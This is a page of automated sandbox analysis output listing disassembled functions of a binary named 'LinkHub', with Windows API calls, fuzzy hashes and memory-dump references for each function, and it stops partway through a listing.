Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 17eeed4841b3bba17a38af057a65fea9eaa8c6745e757c10a58960b7a2692acc
Instruction ID: 8507ec29b20b9f27628e505f51d16932fcf485c6698042965ead127921dfbaf9
Opcode Fuzzy Hash: 17eeed4841b3bba17a38af057a65fea9eaa8c6745e757c10a58960b7a2692acc
Instruction Fuzzy Hash: FF41C370104304AFC721EF28DCD9FBA7BE8FB46724F140AA9FA558B1A1C7709944DB61

Function 00C48C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00C0FBEF,00000000,?,?,00000000,?,00BF39E2,00000004,00000000,00000000), ref: 00C48CA7
EnableWindow.USER32(?,00000000), ref: 00C48CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00C48D2C
ShowWindow.USER32(?,00000004), ref: 00C48D40
EnableWindow.USER32(?,00000001), ref: 00C48D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00C48D8A

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: eb4ec222221517640b710aaca2af5da75d54b7ab41842be66eb0b8a080d0ebe8
Instruction ID: 98256dd86dcd17bc74dc7c695689124251405956b5fdaff84bcc36f17741948e
Opcode Fuzzy Hash: eb4ec222221517640b710aaca2af5da75d54b7ab41842be66eb0b8a080d0ebe8
Instruction Fuzzy Hash: 77410734602255AFDB25DF24C9C9FAD7BF1FB46304F1800A9E9195B2B2CB35AD49CB60

Function 00C32D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00C32D45

Part of subcall function 00C2EF33: GetWindowRect.USER32(?,?), ref: 00C2EF4B

GetDesktopWindow.USER32 ref: 00C32D6F
GetWindowRect.USER32(00000000), ref: 00C32D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00C32DB2
GetCursorPos.USER32(?), ref: 00C32DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C32E3C

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: a698cbda3c9c659820de993ed66d502a5f82597749fb0b50db6026ef2adfc34d
Instruction ID: d7506d3bba6069fcd686dbe221aeca8f8adee695ecc59c1fc63e283447fa449e
Opcode Fuzzy Hash: a698cbda3c9c659820de993ed66d502a5f82597749fb0b50db6026ef2adfc34d
Instruction Fuzzy Hash: 1231C276505315ABCB20EF14D849F9BB7A9FFC6354F000919F89997181DB30EA49CBD2

Function 00C155E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C155F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C15616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C1564E
_wcslen.LIBCMT ref: 00C1566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C15674
_wcsstr.LIBVCRUNTIME ref: 00C1567E

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: ee0093931e8c20f9f690243bd88080aa1740a6826fa38a6a38e8144752d359f1
Instruction ID: 449ed75d568928f090acf80d1030eb168f235d0e25023c9e00b0691955b76aef
Opcode Fuzzy Hash: ee0093931e8c20f9f690243bd88080aa1740a6826fa38a6a38e8144752d359f1
Instruction Fuzzy Hash: 9C212971204500BBEB156B259C49FBFBBE8EF86710F14406AF806DA291EB75CD81A6A0

Function 00C26263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB55D1,?,?,00BF4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BB5871

_wcslen.LIBCMT ref: 00C262C0
CoInitialize.OLE32(00000000), ref: 00C263DA
CoCreateInstance.OLE32(00C50CC4,00000000,00000001,00C50B34,?), ref: 00C263F3
CoUninitialize.OLE32 ref: 00C26411

Strings

.lnk, xrefs: 00C262BB, 00C26306, 00C263CA

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 344496d0a0b3b15cf14eafc7707f81928141bd113cf3da5826e94207eebffc94
Instruction ID: e491d2ba27ad0e7deeb7847e46e15dfe0d18903eb20309351e4218b2b118067b
Opcode Fuzzy Hash: 344496d0a0b3b15cf14eafc7707f81928141bd113cf3da5826e94207eebffc94
Instruction Fuzzy Hash: D6D16275A043119FC714DF24D480A6ABBE5FF89714F10889CF89A9B361CB71ED45CBA2

Function 00C486FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00C48740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00C48765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C4877D
GetSystemMetrics.USER32(00000004), ref: 00C487A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C2C1F2,00000000), ref: 00C487C6

Part of subcall function 00BB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB24B0

GetSystemMetrics.USER32(00000004), ref: 00C487B1

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 62067884961b44193d52f89331bde494d33e5238c6b482cb21cb6b50e38105f9
Instruction ID: d65780b6d78378d879a0968ec1f7589c1f49c7f012acdedb1611b3245b92cbf6
Opcode Fuzzy Hash: 62067884961b44193d52f89331bde494d33e5238c6b482cb21cb6b50e38105f9
Instruction Fuzzy Hash: 20215975610251AFCB24AF39CC58B6E3BE5FB85365F254A29F936C22E0EE308954CB10

Function 00BD36F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00BD36E9,00BD3355), ref: 00BD3700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BD370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BD3727
SetLastError.KERNEL32(00000000,?,00BD36E9,00BD3355), ref: 00BD3779

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 1a4298a0e6ef7abd5c1a4b7371c62f1bd18b89e147899cf93d47b1cd39914036
Instruction ID: 6b6fd20ab25cad056029931122ac09c9d0ed660158199c5706eab88b39a7c5bd
Opcode Fuzzy Hash: 1a4298a0e6ef7abd5c1a4b7371c62f1bd18b89e147899cf93d47b1cd39914036
Instruction Fuzzy Hash: 600128F661EB112EA72427B4ACC6B6EAAE4FB05F71B2002BBF016503F2FF114D419142

Function 00BE30E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00BE2908,00C79B48,0000000C,00BD3268,00000001,?,?), ref: 00BE30EB
_free.LIBCMT ref: 00BE311E
_free.LIBCMT ref: 00BE3146
SetLastError.KERNEL32(00000000), ref: 00BE3153
SetLastError.KERNEL32(00000000), ref: 00BE315F
_abort.LIBCMT ref: 00BE3165

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 8195b2e55a3b4aae4b4e6b47d1e7701f62a0eabaaf797c0a0ba94a51481c7267
Instruction ID: 05f556939bb67986fc8e370b967f38cd5a59b53af36b69324650babb8958ab41
Opcode Fuzzy Hash: 8195b2e55a3b4aae4b4e6b47d1e7701f62a0eabaaf797c0a0ba94a51481c7267
Instruction Fuzzy Hash: 58F0A43694458027C2123737AC0EB5E16FAEFC1F71F2544ACFA29B32E1EF218A024162

Function 00C49480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00BB1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BB1F87
Part of subcall function 00BB1F2D: SelectObject.GDI32(?,00000000), ref: 00BB1F96
Part of subcall function 00BB1F2D: BeginPath.GDI32(?), ref: 00BB1FAD
Part of subcall function 00BB1F2D: SelectObject.GDI32(?,00000000), ref: 00BB1FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00C494AA
LineTo.GDI32(?,00000003,00000000), ref: 00C494BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00C494CC
LineTo.GDI32(?,00000000,00000003), ref: 00C494DC
EndPath.GDI32(?), ref: 00C494EC
StrokePath.GDI32(?), ref: 00C494FC

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: a481f7d8ca8917be6402b7a39e029defc5e32f2d21d2b771a9e598c7dba8715b
Instruction ID: a7770fe2792aa347c0e7cceda42c3f51e2a7def3c58e00eedf9359a505b0d4e8
Opcode Fuzzy Hash: a481f7d8ca8917be6402b7a39e029defc5e32f2d21d2b771a9e598c7dba8715b
Instruction Fuzzy Hash: 1D110976000109BFDB029F90DC88FAE7F6DFB09364F008011FE1A4A161C771AE55DBA0

Function 00C15B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C15B7C
GetDeviceCaps.GDI32(00000000,00000058), ref: 00C15B8D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C15B94
ReleaseDC.USER32(00000000,00000000), ref: 00C15B9C
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C15BB3
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00C15BC5

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 7a975dcb05b7875b7fc501e658cb6d622fe4c89adb6312bbe10d4b38baf0aaa3
Instruction ID: 276b3d3222892413726ba41c47877557e5106c4c0187f94674fe5a7733af0e7c
Opcode Fuzzy Hash: 7a975dcb05b7875b7fc501e658cb6d622fe4c89adb6312bbe10d4b38baf0aaa3
Instruction Fuzzy Hash: C5014F79A00718BBEB10AFA59C49F8EBFB8FB49751F104065FA09A7280D6709D40DBA0

Function 00BB327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BB32AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 00BB32B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BB32C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BB32CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 00BB32D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BB32DD

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 70bd750875bce66d32652b840f6e5a657d4e45477f8c35e70931a530634ed8b3
Instruction ID: 3c9360c1fec509e5121ad9a15acb2058a263a8384838738ad382d570986cdce7
Opcode Fuzzy Hash: 70bd750875bce66d32652b840f6e5a657d4e45477f8c35e70931a530634ed8b3
Instruction Fuzzy Hash: 1F016CB09017597DE3009F5A8C85B56FFA8FF19354F00415BA15C47941C7F5A864CBE5

Function 00C1F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C1F447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C1F45D
GetWindowThreadProcessId.USER32(?,?), ref: 00C1F46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C1F47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C1F485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C1F48C

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 2311f9f176280b7639acb67d31e42a0bf4984d6f655091a26e0d81329bfe71ea
Instruction ID: 25bb461cf498bf149b4f6730a4e20cddc4a86bfcb06842a378fd7d109091e460
Opcode Fuzzy Hash: 2311f9f176280b7639acb67d31e42a0bf4984d6f655091a26e0d81329bfe71ea
Instruction Fuzzy Hash: 3CF03036241158BBE7216B529C0EFEF3B7CFFC7B21F000058FA0691090D7A45A41D6B5

Function 00BF34D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00BF34EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 00BF3506
GetWindowDC.USER32(?), ref: 00BF3512
GetPixel.GDI32(00000000,?,?), ref: 00BF3521
ReleaseDC.USER32(?,00000000), ref: 00BF3533
GetSysColor.USER32(00000005), ref: 00BF354D

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: cd4c0aea8ee442b707c71e041642e03c39ab6e951ea0a56d73654bbe796ef334
Instruction ID: 7efba7707c6a52a63d56f71f0aa29b5514fefe893770d3b6fbe94486cef24680
Opcode Fuzzy Hash: cd4c0aea8ee442b707c71e041642e03c39ab6e951ea0a56d73654bbe796ef334
Instruction Fuzzy Hash: 11014635500209EFDB506FA4DC08BFE7BF5FF5A721F5105A0FA2AA21A1CB311E51AB10

Function 00C121C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C121CC
UnloadUserProfile.USERENV(?,?), ref: 00C121D8
CloseHandle.KERNEL32(?), ref: 00C121E1
CloseHandle.KERNEL32(?), ref: 00C121E9
GetProcessHeap.KERNEL32(00000000,?), ref: 00C121F2
HeapFree.KERNEL32(00000000), ref: 00C121F9

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: ed7b5f172c6e94cb237f36a76410afcf7ca70459b6ac072bce8c823359822ee7
Instruction ID: c214d7a6c8d662c4642a773299f6995d02a6f9a0cf485e5f22e5eff0d2aff2b8
Opcode Fuzzy Hash: ed7b5f172c6e94cb237f36a76410afcf7ca70459b6ac072bce8c823359822ee7
Instruction Fuzzy Hash: A8E0757A104505BBDB012FA5EC0DB4EBF79FF4A732B504625F62682474CB329461DB51

Function 00C1CE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB41EA: _wcslen.LIBCMT ref: 00BB41EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C1CF99
_wcslen.LIBCMT ref: 00C1CFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C1D047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C1D075

Strings

0, xrefs: 00C1CF5A

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 77b12018356b9473164a06bfefce69ac3ea67de580b75276d3e715d0133511e2
Instruction ID: bb0f487dcf9673f03ae91c6edadabb1ca96b22742ae8f632f9345fd7d2f0a7cf
Opcode Fuzzy Hash: 77b12018356b9473164a06bfefce69ac3ea67de580b75276d3e715d0133511e2
Instruction Fuzzy Hash: 6351D2716143009BD714AF64C885BEBB7E8AF4A314F040A2DF9A6D3291DB70CE86E752

Function 00C3B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00C3B903

Part of subcall function 00BB41EA: _wcslen.LIBCMT ref: 00BB41EF

GetProcessId.KERNEL32(00000000), ref: 00C3B998
CloseHandle.KERNEL32(00000000), ref: 00C3B9C7

Strings

@, xrefs: 00C3B8D2
<, xrefs: 00C3B8CB

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: e54ae29677eb7ddc342bef88224073544078f1d400e4758c2d912ec2ba095b7c
Instruction ID: 62057dc082e43cdf0e1d0f8d1e23dadeb3cbcb5f67312f544a5c68979c0bd58b
Opcode Fuzzy Hash: e54ae29677eb7ddc342bef88224073544078f1d400e4758c2d912ec2ba095b7c
Instruction Fuzzy Hash: 60714875A10215DFCB14EF54C495AADBBF4BF08310F048499E966AB3A2CBB4EE41CB91

Function 00C17B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C17B6D
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C17BA3
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C17BB4
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C17C36

Strings

DllGetClassObject, xrefs: 00C17BA9

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
